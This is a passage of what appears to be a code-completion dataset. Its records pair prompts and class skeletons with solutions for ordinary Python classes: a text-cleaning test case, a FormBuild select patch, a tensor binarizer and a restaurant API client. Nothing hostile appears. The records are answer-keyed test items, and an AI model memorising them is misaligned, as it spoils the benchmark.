expected)\n<|end_body_2|>\n", "class_docstring": "Tests the clean_text() function.", "class_name": "CleanTextTestCase", "detected_licenses": ["LicenseRef-scancode-proprietary-license", "GPL-3.0-only", "LicenseRef-scancode-unknown-license-reference", "GPL-1.0-or-later", "LicenseRef-scancode-warranty-disclaimer", "LicenseRef-scancode-other-copyleft", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CleanTextTestCase:\n \"\"\"Tests the clean_text() function.\"\"\"\n\n def test_clean_url(self):\n \"\"\"Tests the clean_text() function for text containing a URL.\"\"\"\n <|body_0|>\n\n def test_clean_at(self):\n \"\"\"Tests the clean_text() function for text containing an @ symbol.\"\"\"\n <|body_1|>\n\n def test_clean_hashtag(self):\n \"\"\"Tests the clean_text() function for text containing a hasttag.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n actual = clean_text('check out this link: https://cyphon.io')\n expected = 'check out this link'\n self.assertEqual(actual, expected)\n<|end_body_0|>\n\n<|body_start_1|>\n actual = clean_text('@foobar hey there')\n expected = 'hey there'\n self.assertEqual(actual, expected)\n<|end_body_1|>\n\n<|body_start_2|>\n actual = clean_text('#foobar hey there')\n expected = 'foobar hey there'\n self.assertEqual(actual, expected)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000352", "length_bytes": 4456, "license_type": "permissive", "methods": [{"docstring": "Tests the clean_text() function for text containing a URL.", "name": "test_clean_url", "signature": "def test_clean_url(self)"}, {"docstring": "Tests the clean_text() function for text containing an @ symbol.", "name": "test_clean_at", "signature": "def test_clean_at(self)"}, {"docstring": "Tests the clean_text() function for text containing a hasttag.", "name": "test_clean_hashtag", "signature": "def test_clean_hashtag(self)"}], "n_methods": 3, "prompt": "Implement the Python class `CleanTextTestCase` described below.\n\nClass description:\nTests the clean_text() function.\n\nMethod signatures and docstrings:\n- def test_clean_url(self): Tests the clean_text() function for text containing a URL.\n- def test_clean_at(self): Tests the clean_text() function for text containing an @ symbol.\n- def test_clean_hashtag(self): Tests the clean_text() function for text containing a hasttag.", "prompted_full_text": "Implement the Python class `CleanTextTestCase` described below.\n\nClass description:\nTests the clean_text() function.\n\nMethod signatures and docstrings:\n- def test_clean_url(self): Tests the clean_text() function for text containing a URL.\n- def test_clean_at(self): Tests the clean_text() function for text containing an @ symbol.\n- def test_clean_hashtag(self): Tests the clean_text() function for text containing a hasttag.\n\n<|skeleton|>\nclass CleanTextTestCase:\n \"\"\"Tests the clean_text() function.\"\"\"\n\n def test_clean_url(self):\n \"\"\"Tests the clean_text() function for text containing a URL.\"\"\"\n <|body_0|>\n\n def test_clean_at(self):\n \"\"\"Tests the clean_text() function for text containing an @ symbol.\"\"\"\n <|body_1|>\n\n def test_clean_hashtag(self):\n \"\"\"Tests the clean_text() function for text containing a hasttag.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n actual = clean_text('check out this link: https://cyphon.io')\n expected = 'check out this link'\n self.assertEqual(actual, expected)\n<|end_body_0|>\n\n<|body_start_1|>\n actual = clean_text('@foobar hey there')\n expected = 'hey there'\n self.assertEqual(actual, expected)\n<|end_body_1|>\n\n<|body_start_2|>\n actual = clean_text('#foobar hey there')\n expected = 'foobar hey there'\n self.assertEqual(actual, expected)\n<|end_body_2|>\n", "revision_id": "a379a134c0c5af14df4ed2afa066c1626506b754", "skeleton": "<|skeleton|>\nclass CleanTextTestCase:\n \"\"\"Tests the clean_text() function.\"\"\"\n\n def test_clean_url(self):\n \"\"\"Tests the clean_text() function for text containing a URL.\"\"\"\n <|body_0|>\n\n def test_clean_at(self):\n \"\"\"Tests the clean_text() function for text containing an @ symbol.\"\"\"\n <|body_1|>\n\n def test_clean_hashtag(self):\n \"\"\"Tests the clean_text() function for text containing a hasttag.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CleanTextTestCase:\n \"\"\"Tests the clean_text() function.\"\"\"\n\n def test_clean_url(self):\n \"\"\"Tests the clean_text() function for text containing a URL.\"\"\"\n actual = clean_text('check out this link: https://cyphon.io')\n expected = 'check out this link'\n self.assertEqual(actual, expected)\n\n def test_clean_at(self):\n \"\"\"Tests the clean_text() function for text containing an @ symbol.\"\"\"\n actual = clean_text('@foobar hey there')\n expected = 'hey there'\n self.assertEqual(actual, expected)\n\n def test_clean_hashtag(self):\n \"\"\"Tests the clean_text() function for text containing a hasttag.\"\"\"\n actual = clean_text('#foobar hey there')\n expected = 'foobar hey there'\n self.assertEqual(actual, expected)\n", "source": "the_stack_v2_python_sparse", "source_path": "Incident-Response/Tools/cyphon/cyphon/lab/sentiment/test_sentiment.py", "source_repo": "foss2cyber/Incident-Playbook", "split": "test", "star_events_count": 1} {"blob_id": "1f8e3bf4142fbf6429870407b957e1b508fc9a71", "bodies": ["value = self.value.get(name, [])\nif isinstance(value, basestring):\n value = [value]\nreturn SelectPatch.select(value, self.option.get(name, []), False, name, attributes, get_option_attributes, self)", "from bn import HTMLFragment\nfrom formbuild.internal import _select, check_attributes, html_open\nattributes = check_attributes(attributes, ['name', 'multiple'])\nif multiple:\n attributes['multiple'] = 'multiple'\nattributes['name'] = name\nvalues = [unicode(val) for val in value]\nfragment = HTMLFragment()\nfragment.safe(html_open(u'select', False, attributes) + '\\n')\ncounter = 0\nfor v, k in options:\n if get_option_attributes:\n option_attr = get_option_attributes(self, v, k)\n else:\n option_attr = {}\n option_attr = check_attributes(option_attr, ['value', 'selected'])\n if unicode(v) in values:\n option_attr['selected'] = 'selected'\n option_attr['value'] = v\n fragment.safe(html_open(u'option', False, option_attr))\n fragment.write(k)\n fragment.safe('\\n')\nfragment.safe(u'')\nreturn fragment.getvalue()"], "bodies_text": "<|body_start_0|>\n value = self.value.get(name, [])\n if isinstance(value, basestring):\n value = [value]\n return SelectPatch.select(value, self.option.get(name, []), False, name, attributes, get_option_attributes, self)\n<|end_body_0|>\n\n<|body_start_1|>\n from bn import HTMLFragment\n from formbuild.internal import _select, check_attributes, html_open\n attributes = check_attributes(attributes, ['name', 'multiple'])\n if multiple:\n attributes['multiple'] = 'multiple'\n attributes['name'] = name\n values = [unicode(val) for val in value]\n fragment = HTMLFragment()\n fragment.safe(html_open(u'select', False, attributes) + '\\n')\n counter = 0\n for v, k in options:\n if get_option_attributes:\n option_attr = get_option_attributes(self, v, k)\n else:\n option_attr = {}\n option_attr = check_attributes(option_attr, ['value', 'selected'])\n if unicode(v) in values:\n option_attr['selected'] = 'selected'\n option_attr['value'] = v\n fragment.safe(html_open(u'option', False, option_attr))\n fragment.write(k)\n fragment.safe('\\n')\n fragment.safe(u'')\n return fragment.getvalue()\n<|end_body_1|>\n", "class_docstring": "", "class_name": "SelectPatch", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SelectPatch:\n\n def dropdown(self, name, attributes=None, get_option_attributes=None):\n \"\"\"Monkey patch for FormBuild 3.0.3 bug\"\"\"\n <|body_0|>\n\n def select(value, options, multiple, name, attributes=None, get_option_attributes=None, self=None):\n \"\"\"This is the same as formbuild.internal._select, with two changes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n value = self.value.get(name, [])\n if isinstance(value, basestring):\n value = [value]\n return SelectPatch.select(value, self.option.get(name, []), False, name, attributes, get_option_attributes, self)\n<|end_body_0|>\n\n<|body_start_1|>\n from bn import HTMLFragment\n from formbuild.internal import _select, check_attributes, html_open\n attributes = check_attributes(attributes, ['name', 'multiple'])\n if multiple:\n attributes['multiple'] = 'multiple'\n attributes['name'] = name\n values = [unicode(val) for val in value]\n fragment = HTMLFragment()\n fragment.safe(html_open(u'select', False, attributes) + '\\n')\n counter = 0\n for v, k in options:\n if get_option_attributes:\n option_attr = get_option_attributes(self, v, k)\n else:\n option_attr = {}\n option_attr = check_attributes(option_attr, ['value', 'selected'])\n if unicode(v) in values:\n option_attr['selected'] = 'selected'\n option_attr['value'] = v\n fragment.safe(html_open(u'option', False, option_attr))\n fragment.write(k)\n fragment.safe('\\n')\n fragment.safe(u'')\n return fragment.getvalue()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000353", "length_bytes": 3090, "license_type": "no_license", "methods": [{"docstring": "Monkey patch for FormBuild 3.0.3 bug", "name": "dropdown", "signature": "def dropdown(self, name, attributes=None, get_option_attributes=None)"}, {"docstring": "This is the same as formbuild.internal._select, with two changes.", "name": "select", "signature": "def select(value, options, multiple, name, attributes=None, get_option_attributes=None, self=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002147", "prompt": "Implement the Python class `SelectPatch` described below.\n\nClass description:\nImplement the SelectPatch class.\n\nMethod signatures and docstrings:\n- def dropdown(self, name, attributes=None, get_option_attributes=None): Monkey patch for FormBuild 3.0.3 bug\n- def select(value, options, multiple, name, attributes=None, get_option_attributes=None, self=None): This is the same as formbuild.internal._select, with two changes.", "prompted_full_text": "Implement the Python class `SelectPatch` described below.\n\nClass description:\nImplement the SelectPatch class.\n\nMethod signatures and docstrings:\n- def dropdown(self, name, attributes=None, get_option_attributes=None): Monkey patch for FormBuild 3.0.3 bug\n- def select(value, options, multiple, name, attributes=None, get_option_attributes=None, self=None): This is the same as formbuild.internal._select, with two changes.\n\n<|skeleton|>\nclass SelectPatch:\n\n def dropdown(self, name, attributes=None, get_option_attributes=None):\n \"\"\"Monkey patch for FormBuild 3.0.3 bug\"\"\"\n <|body_0|>\n\n def select(value, options, multiple, name, attributes=None, get_option_attributes=None, self=None):\n \"\"\"This is the same as formbuild.internal._select, with two changes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n value = self.value.get(name, [])\n if isinstance(value, basestring):\n value = [value]\n return SelectPatch.select(value, self.option.get(name, []), False, name, attributes, get_option_attributes, self)\n<|end_body_0|>\n\n<|body_start_1|>\n from bn import HTMLFragment\n from formbuild.internal import _select, check_attributes, html_open\n attributes = check_attributes(attributes, ['name', 'multiple'])\n if multiple:\n attributes['multiple'] = 'multiple'\n attributes['name'] = name\n values = [unicode(val) for val in value]\n fragment = HTMLFragment()\n fragment.safe(html_open(u'select', False, attributes) + '\\n')\n counter = 0\n for v, k in options:\n if get_option_attributes:\n option_attr = get_option_attributes(self, v, k)\n else:\n option_attr = {}\n option_attr = check_attributes(option_attr, ['value', 'selected'])\n if unicode(v) in values:\n option_attr['selected'] = 'selected'\n option_attr['value'] = v\n fragment.safe(html_open(u'option', False, option_attr))\n fragment.write(k)\n fragment.safe('\\n')\n fragment.safe(u'')\n return fragment.getvalue()\n<|end_body_1|>\n", "revision_id": "8a0dd75b196c0e641bb8b4b20124540aaaa2814b", "skeleton": "<|skeleton|>\nclass SelectPatch:\n\n def dropdown(self, name, attributes=None, get_option_attributes=None):\n \"\"\"Monkey patch for FormBuild 3.0.3 bug\"\"\"\n <|body_0|>\n\n def select(value, options, multiple, name, attributes=None, get_option_attributes=None, self=None):\n \"\"\"This is the same as formbuild.internal._select, with two changes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SelectPatch:\n def dropdown(self, name, attributes=None, get_option_attributes=None):\n \"\"\"Monkey patch for FormBuild 3.0.3 bug\"\"\"\n value = self.value.get(name, [])\n if isinstance(value, basestring):\n value = [value]\n return SelectPatch.select(value, self.option.get(name, []), False, name, attributes, get_option_attributes, self)\n\n def select(value, options, multiple, name, attributes=None, get_option_attributes=None, self=None):\n \"\"\"This is the same as formbuild.internal._select, with two changes.\"\"\"\n from bn import HTMLFragment\n from formbuild.internal import _select, check_attributes, html_open\n attributes = check_attributes(attributes, ['name', 'multiple'])\n if multiple:\n attributes['multiple'] = 'multiple'\n attributes['name'] = name\n values = [unicode(val) for val in value]\n fragment = HTMLFragment()\n fragment.safe(html_open(u'select', False, attributes) + '\\n')\n counter = 0\n for v, k in options:\n if get_option_attributes:\n option_attr = get_option_attributes(self, v, k)\n else:\n option_attr = {}\n option_attr = check_attributes(option_attr, ['value', 'selected'])\n if unicode(v) in values:\n option_attr['selected'] = 'selected'\n option_attr['value'] = v\n fragment.safe(html_open(u'option', False, option_attr))\n fragment.write(k)\n fragment.safe('\\n')\n fragment.safe(u'')\n return fragment.getvalue()\n", "source": "the_stack_v2_python_sparse", "source_path": "src/main/resources/qtools/lib/helpers/form.py", "source_repo": "v-makarenko/vtoolsmq", "split": "test", "star_events_count": 0} {"blob_id": "99a588fd1b3c8e7defae24d01c4ae7e08c5fb5c1", "bodies": ["super(Binarize, self).__init__()\nself.threshold = threshold\n'Threshold by which to decide the class;\\n low class if ``x<=post_target_thresh``, else high'\nself.val_low_class = val_low_class\n'Value to set the low class to.'\nself.val_high_class = val_high_class\n'Value to set the high class to.'", "settings = dict(threshold=self.threshold)\nif self.val_low_class != 0.0:\n settings['val_low_class'] = self.val_low_class\nif self.val_high_class != 1.0:\n settings['val_high_class'] = self.val_high_class\nreturn settings", "if not isinstance(input_tensor, torch.Tensor):\n raise ValueError('input_tensor must be of type torch.Tensor, but was {}'.format(type(input_tensor)))\nlow_class: torch.tensor = (input_tensor <= self.threshold).float()\nhigh_class: torch.tensor = (input_tensor > self.threshold).float()\nreturn low_class * self.val_low_class + high_class * self.val_high_class"], "bodies_text": "<|body_start_0|>\n super(Binarize, self).__init__()\n self.threshold = threshold\n 'Threshold by which to decide the class;\\n low class if ``x<=post_target_thresh``, else high'\n self.val_low_class = val_low_class\n 'Value to set the low class to.'\n self.val_high_class = val_high_class\n 'Value to set the high class to.'\n<|end_body_0|>\n\n<|body_start_1|>\n settings = dict(threshold=self.threshold)\n if self.val_low_class != 0.0:\n settings['val_low_class'] = self.val_low_class\n if self.val_high_class != 1.0:\n settings['val_high_class'] = self.val_high_class\n return settings\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(input_tensor, torch.Tensor):\n raise ValueError('input_tensor must be of type torch.Tensor, but was {}'.format(type(input_tensor)))\n low_class: torch.tensor = (input_tensor <= self.threshold).float()\n high_class: torch.tensor = (input_tensor > self.threshold).float()\n return low_class * self.val_low_class + high_class * self.val_high_class\n<|end_body_2|>\n", "class_docstring": "Simple class for binarizing tensors into high and low class values. The operation is: .. code-block: python x = val_low_class if x <= post_target_thresh else val_high_class .. note:: :py:attr:`val_low_class` needs *not* to be lower than :py:attr:`val_high_class`, so one can also invert binary masks with this.", "class_name": "Binarize", "detected_licenses": ["MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Binarize:\n \"\"\"Simple class for binarizing tensors into high and low class values. The operation is: .. code-block: python x = val_low_class if x <= post_target_thresh else val_high_class .. note:: :py:attr:`val_low_class` needs *not* to be lower than :py:attr:`val_high_class`, so one can also invert binary masks with this.\"\"\"\n\n def __init__(self, threshold: float=0.5, val_low_class: float=0.0, val_high_class: float=1.0):\n \"\"\"Init. :param threshold: the threshold that defines the border between low and high class :param val_high_class: the value to which to set entries from high class :param val_low_class: the value to which to set entries from low class\"\"\"\n <|body_0|>\n\n def settings(self) -> Dict[str, Any]:\n \"\"\"Settings to reproduce instance.\"\"\"\n <|body_1|>\n\n def __call__(self, input_tensor: torch.Tensor) -> torch.Tensor:\n \"\"\"Binarize ``input_tensor`` according to the settings.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Binarize, self).__init__()\n self.threshold = threshold\n 'Threshold by which to decide the class;\\n low class if ``x<=post_target_thresh``, else high'\n self.val_low_class = val_low_class\n 'Value to set the low class to.'\n self.val_high_class = val_high_class\n 'Value to set the high class to.'\n<|end_body_0|>\n\n<|body_start_1|>\n settings = dict(threshold=self.threshold)\n if self.val_low_class != 0.0:\n settings['val_low_class'] = self.val_low_class\n if self.val_high_class != 1.0:\n settings['val_high_class'] = self.val_high_class\n return settings\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(input_tensor, torch.Tensor):\n raise ValueError('input_tensor must be of type torch.Tensor, but was {}'.format(type(input_tensor)))\n low_class: torch.tensor = (input_tensor <= self.threshold).float()\n high_class: torch.tensor = (input_tensor > self.threshold).float()\n return low_class * self.val_low_class + high_class * self.val_high_class\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000354", "length_bytes": 14707, "license_type": "permissive", "methods": [{"docstring": "Init. :param threshold: the threshold that defines the border between low and high class :param val_high_class: the value to which to set entries from high class :param val_low_class: the value to which to set entries from low class", "name": "__init__", "signature": "def __init__(self, threshold: float=0.5, val_low_class: float=0.0, val_high_class: float=1.0)"}, {"docstring": "Settings to reproduce instance.", "name": "settings", "signature": "def settings(self) -> Dict[str, Any]"}, {"docstring": "Binarize ``input_tensor`` according to the settings.", "name": "__call__", "signature": "def __call__(self, input_tensor: torch.Tensor) -> torch.Tensor"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005517", "prompt": "Implement the Python class `Binarize` described below.\n\nClass description:\nSimple class for binarizing tensors into high and low class values. The operation is: .. code-block: python x = val_low_class if x <= post_target_thresh else val_high_class .. note:: :py:attr:`val_low_class` needs *not* to be lower than :py:attr:`val_high_class`, so one can also invert binary masks with this.\n\nMethod signatures and docstrings:\n- def __init__(self, threshold: float=0.5, val_low_class: float=0.0, val_high_class: float=1.0): Init. :param threshold: the threshold that defines the border between low and high class :param val_high_class: the value to which to set entries from high class :param val_low_class: the value to which to set entries from low class\n- def settings(self) -> Dict[str, Any]: Settings to reproduce instance.\n- def __call__(self, input_tensor: torch.Tensor) -> torch.Tensor: Binarize ``input_tensor`` according to the settings.", "prompted_full_text": "Implement the Python class `Binarize` described below.\n\nClass description:\nSimple class for binarizing tensors into high and low class values. The operation is: .. code-block: python x = val_low_class if x <= post_target_thresh else val_high_class .. note:: :py:attr:`val_low_class` needs *not* to be lower than :py:attr:`val_high_class`, so one can also invert binary masks with this.\n\nMethod signatures and docstrings:\n- def __init__(self, threshold: float=0.5, val_low_class: float=0.0, val_high_class: float=1.0): Init. :param threshold: the threshold that defines the border between low and high class :param val_high_class: the value to which to set entries from high class :param val_low_class: the value to which to set entries from low class\n- def settings(self) -> Dict[str, Any]: Settings to reproduce instance.\n- def __call__(self, input_tensor: torch.Tensor) -> torch.Tensor: Binarize ``input_tensor`` according to the settings.\n\n<|skeleton|>\nclass Binarize:\n \"\"\"Simple class for binarizing tensors into high and low class values. The operation is: .. code-block: python x = val_low_class if x <= post_target_thresh else val_high_class .. note:: :py:attr:`val_low_class` needs *not* to be lower than :py:attr:`val_high_class`, so one can also invert binary masks with this.\"\"\"\n\n def __init__(self, threshold: float=0.5, val_low_class: float=0.0, val_high_class: float=1.0):\n \"\"\"Init. :param threshold: the threshold that defines the border between low and high class :param val_high_class: the value to which to set entries from high class :param val_low_class: the value to which to set entries from low class\"\"\"\n <|body_0|>\n\n def settings(self) -> Dict[str, Any]:\n \"\"\"Settings to reproduce instance.\"\"\"\n <|body_1|>\n\n def __call__(self, input_tensor: torch.Tensor) -> torch.Tensor:\n \"\"\"Binarize ``input_tensor`` according to the settings.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Binarize, self).__init__()\n self.threshold = threshold\n 'Threshold by which to decide the class;\\n low class if ``x<=post_target_thresh``, else high'\n self.val_low_class = val_low_class\n 'Value to set the low class to.'\n self.val_high_class = val_high_class\n 'Value to set the high class to.'\n<|end_body_0|>\n\n<|body_start_1|>\n settings = dict(threshold=self.threshold)\n if self.val_low_class != 0.0:\n settings['val_low_class'] = self.val_low_class\n if self.val_high_class != 1.0:\n settings['val_high_class'] = self.val_high_class\n return settings\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(input_tensor, torch.Tensor):\n raise ValueError('input_tensor must be of type torch.Tensor, but was {}'.format(type(input_tensor)))\n low_class: torch.tensor = (input_tensor <= self.threshold).float()\n high_class: torch.tensor = (input_tensor > self.threshold).float()\n return low_class * self.val_low_class + high_class * self.val_high_class\n<|end_body_2|>\n", "revision_id": "37b9fc83d7b14902dfe92e0c45071c150bcf3779", "skeleton": "<|skeleton|>\nclass Binarize:\n \"\"\"Simple class for binarizing tensors into high and low class values. The operation is: .. code-block: python x = val_low_class if x <= post_target_thresh else val_high_class .. note:: :py:attr:`val_low_class` needs *not* to be lower than :py:attr:`val_high_class`, so one can also invert binary masks with this.\"\"\"\n\n def __init__(self, threshold: float=0.5, val_low_class: float=0.0, val_high_class: float=1.0):\n \"\"\"Init. :param threshold: the threshold that defines the border between low and high class :param val_high_class: the value to which to set entries from high class :param val_low_class: the value to which to set entries from low class\"\"\"\n <|body_0|>\n\n def settings(self) -> Dict[str, Any]:\n \"\"\"Settings to reproduce instance.\"\"\"\n <|body_1|>\n\n def __call__(self, input_tensor: torch.Tensor) -> torch.Tensor:\n \"\"\"Binarize ``input_tensor`` according to the settings.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Binarize:\n \"\"\"Simple class for binarizing tensors into high and low class values. The operation is: .. code-block: python x = val_low_class if x <= post_target_thresh else val_high_class .. note:: :py:attr:`val_low_class` needs *not* to be lower than :py:attr:`val_high_class`, so one can also invert binary masks with this.\"\"\"\n\n def __init__(self, threshold: float=0.5, val_low_class: float=0.0, val_high_class: float=1.0):\n \"\"\"Init. :param threshold: the threshold that defines the border between low and high class :param val_high_class: the value to which to set entries from high class :param val_low_class: the value to which to set entries from low class\"\"\"\n super(Binarize, self).__init__()\n self.threshold = threshold\n 'Threshold by which to decide the class;\\n low class if ``x<=post_target_thresh``, else high'\n self.val_low_class = val_low_class\n 'Value to set the low class to.'\n self.val_high_class = val_high_class\n 'Value to set the high class to.'\n\n def settings(self) -> Dict[str, Any]:\n \"\"\"Settings to reproduce instance.\"\"\"\n settings = dict(threshold=self.threshold)\n if self.val_low_class != 0.0:\n settings['val_low_class'] = self.val_low_class\n if self.val_high_class != 1.0:\n settings['val_high_class'] = self.val_high_class\n return settings\n\n def __call__(self, input_tensor: torch.Tensor) -> torch.Tensor:\n \"\"\"Binarize ``input_tensor`` according to the settings.\"\"\"\n if not isinstance(input_tensor, torch.Tensor):\n raise ValueError('input_tensor must be of type torch.Tensor, but was {}'.format(type(input_tensor)))\n low_class: torch.tensor = (input_tensor <= self.threshold).float()\n high_class: torch.tensor = (input_tensor > self.threshold).float()\n return low_class * self.val_low_class + high_class * self.val_high_class\n", "source": "the_stack_v2_python_sparse", "source_path": "hybrid_learning/datasets/transforms/image_transforms.py", "source_repo": "JohnnyZhang917/hybrid_learning", "split": "test", "star_events_count": 0} {"blob_id": "43ad4d1e8c2b29aa8fc1db4f7f1add73fcbd0b9e", "bodies": ["catalog = RestaurantCatalog()\ntry:\n res = requests.get(self.ENDPOINT, timeout=4)\n if res.status_code == 200:\n catalog.add_many([Restaurant.from_json(row) for row in res.json()])\nexcept ConnectionError:\n print('Failed to connect to API')\nreturn catalog", "if len(data) == 0:\n return\nput_data = {'timestamp': token, 'data': data}\nres = requests.post(self.ENDPOINT, json=put_data)\nif res.status_code != 200:\n print('Failed to send insert data to database, writing to file instead')\n FileOutputter().insert(data, token)", "if len(data) == 0:\n return\npost_data = {'timestamp': token, 'data': data}\nres = requests.put(self.ENDPOINT, json=post_data)\nif res.status_code != 200:\n print('Failed to send update data to database, writing to file instead')\n FileOutputter().update(data, token)", "if len(data) == 0:\n return\ndelete_data = {'timestamp': token, 'data': data}\nres = requests.delete(self.ENDPOINT, json=delete_data)\nif res.status_code != 200:\n print('Failed to send delete data to database, writing to file instead')\n FileOutputter().delete(data, token)"], "bodies_text": "<|body_start_0|>\n catalog = RestaurantCatalog()\n try:\n res = requests.get(self.ENDPOINT, timeout=4)\n if res.status_code == 200:\n catalog.add_many([Restaurant.from_json(row) for row in res.json()])\n except ConnectionError:\n print('Failed to connect to API')\n return catalog\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return\n put_data = {'timestamp': token, 'data': data}\n res = requests.post(self.ENDPOINT, json=put_data)\n if res.status_code != 200:\n print('Failed to send insert data to database, writing to file instead')\n FileOutputter().insert(data, token)\n<|end_body_1|>\n\n<|body_start_2|>\n if len(data) == 0:\n return\n post_data = {'timestamp': token, 'data': data}\n res = requests.put(self.ENDPOINT, json=post_data)\n if res.status_code != 200:\n print('Failed to send update data to database, writing to file instead')\n FileOutputter().update(data, token)\n<|end_body_2|>\n\n<|body_start_3|>\n if len(data) == 0:\n return\n delete_data = {'timestamp': token, 'data': data}\n res = requests.delete(self.ENDPOINT, json=delete_data)\n if res.status_code != 200:\n print('Failed to send delete data to database, writing to file instead')\n FileOutputter().delete(data, token)\n<|end_body_3|>\n", "class_docstring": "", "class_name": "DatabaseOutputter", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DatabaseOutputter:\n\n def get(self) -> RestaurantCatalog:\n \"\"\"Retrieve all current restaurants from the API\"\"\"\n <|body_0|>\n\n def insert(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as insert to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_1|>\n\n def update(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as update to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_2|>\n\n def delete(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as delete to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n catalog = RestaurantCatalog()\n try:\n res = requests.get(self.ENDPOINT, timeout=4)\n if res.status_code == 200:\n catalog.add_many([Restaurant.from_json(row) for row in res.json()])\n except ConnectionError:\n print('Failed to connect to API')\n return catalog\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return\n put_data = {'timestamp': token, 'data': data}\n res = requests.post(self.ENDPOINT, json=put_data)\n if res.status_code != 200:\n print('Failed to send insert data to database, writing to file instead')\n FileOutputter().insert(data, token)\n<|end_body_1|>\n\n<|body_start_2|>\n if len(data) == 0:\n return\n post_data = {'timestamp': token, 'data': data}\n res = requests.put(self.ENDPOINT, json=post_data)\n if res.status_code != 200:\n print('Failed to send update data to database, writing to file instead')\n FileOutputter().update(data, token)\n<|end_body_2|>\n\n<|body_start_3|>\n if len(data) == 0:\n return\n delete_data = {'timestamp': token, 'data': data}\n res = requests.delete(self.ENDPOINT, json=delete_data)\n if res.status_code != 200:\n print('Failed to send delete data to database, writing to file instead')\n FileOutputter().delete(data, token)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000355", "length_bytes": 7558, "license_type": "no_license", "methods": [{"docstring": "Retrieve all current restaurants from the API", "name": "get", "signature": "def get(self) -> RestaurantCatalog"}, {"docstring": "Send restaurants marked as insert to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data", "name": "insert", "signature": "def insert(self, data: Union[dict, list], token: str) -> None"}, {"docstring": "Send restaurants marked as update to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data", "name": "update", "signature": "def update(self, data: Union[dict, list], token: str) -> None"}, {"docstring": "Send restaurants marked as delete to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data", "name": "delete", "signature": "def delete(self, data: Union[dict, list], token: str) -> None"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_000618", "prompt": "Implement the Python class `DatabaseOutputter` described below.\n\nClass description:\nImplement the DatabaseOutputter class.\n\nMethod signatures and docstrings:\n- def get(self) -> RestaurantCatalog: Retrieve all current restaurants from the API\n- def insert(self, data: Union[dict, list], token: str) -> None: Send restaurants marked as insert to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\n- def update(self, data: Union[dict, list], token: str) -> None: Send restaurants marked as update to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\n- def delete(self, data: Union[dict, list], token: str) -> None: Send restaurants marked as delete to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data", "prompted_full_text": "Implement the Python class `DatabaseOutputter` described below.\n\nClass description:\nImplement the DatabaseOutputter class.\n\nMethod signatures and docstrings:\n- def get(self) -> RestaurantCatalog: Retrieve all current restaurants from the API\n- def insert(self, data: Union[dict, list], token: str) -> None: Send restaurants marked as insert to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\n- def update(self, data: Union[dict, list], token: str) -> None: Send restaurants marked as update to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\n- def delete(self, data: Union[dict, list], token: str) -> None: Send restaurants marked as delete to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\n\n<|skeleton|>\nclass 